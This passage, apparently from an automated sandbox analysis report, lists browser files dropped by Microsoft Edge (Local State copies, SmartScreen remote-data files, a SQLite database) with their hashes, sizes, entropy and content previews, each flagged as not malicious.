                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41ea0.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.0898018136551775
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWBdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynn0kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:D97F50FFCB5706CD18AA51F6BB81C6CA
                                                                                                                                                                                                                                                                                                      SHA1:38F68E971CF53E78DB46DA70E66F1F41F793FD4B
                                                                                                                                                                                                                                                                                                      SHA-256:0D3226017EF75ED36EED0FAF059760596E0C70A57A8456FAF63C80D497721B2D
                                                                                                                                                                                                                                                                                                      SHA-512:3647F063E1588DEBFE34B2EDDD0A74E96AFB02A4EA30D32E4B00A4113311A594348C1A836F70E8744981E5EC8D5EA721C8303B42C90C68FF81D960960416768B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41fb9.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.0898018136551775
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWBdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynn0kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:D97F50FFCB5706CD18AA51F6BB81C6CA
                                                                                                                                                                                                                                                                                                      SHA1:38F68E971CF53E78DB46DA70E66F1F41F793FD4B
                                                                                                                                                                                                                                                                                                      SHA-256:0D3226017EF75ED36EED0FAF059760596E0C70A57A8456FAF63C80D497721B2D
                                                                                                                                                                                                                                                                                                      SHA-512:3647F063E1588DEBFE34B2EDDD0A74E96AFB02A4EA30D32E4B00A4113311A594348C1A836F70E8744981E5EC8D5EA721C8303B42C90C68FF81D960960416768B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4466b.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.0898018136551775
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWBdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynn0kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:D97F50FFCB5706CD18AA51F6BB81C6CA
                                                                                                                                                                                                                                                                                                      SHA1:38F68E971CF53E78DB46DA70E66F1F41F793FD4B
                                                                                                                                                                                                                                                                                                      SHA-256:0D3226017EF75ED36EED0FAF059760596E0C70A57A8456FAF63C80D497721B2D
                                                                                                                                                                                                                                                                                                      SHA-512:3647F063E1588DEBFE34B2EDDD0A74E96AFB02A4EA30D32E4B00A4113311A594348C1A836F70E8744981E5EC8D5EA721C8303B42C90C68FF81D960960416768B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF484eb.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.0898018136551775
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWBdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynn0kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:D97F50FFCB5706CD18AA51F6BB81C6CA
                                                                                                                                                                                                                                                                                                      SHA1:38F68E971CF53E78DB46DA70E66F1F41F793FD4B
                                                                                                                                                                                                                                                                                                      SHA-256:0D3226017EF75ED36EED0FAF059760596E0C70A57A8456FAF63C80D497721B2D
                                                                                                                                                                                                                                                                                                      SHA-512:3647F063E1588DEBFE34B2EDDD0A74E96AFB02A4EA30D32E4B00A4113311A594348C1A836F70E8744981E5EC8D5EA721C8303B42C90C68FF81D960960416768B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                      MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                      SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                      SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                      SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):47
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                      MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                      SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                      SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                      SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):35
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                      MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                      SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                      SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                      SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                      MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                      SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                      SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                      SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):130439
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                      MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                      SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                      SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                      SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                      MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                      SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                      SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                      SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):57
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                      MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                      SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                      SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                      SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                      MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                      SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                      SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                      SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):575056
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                      MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                      SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                      SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                      SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:raw G3 (Group 3) FAX, byte-padded
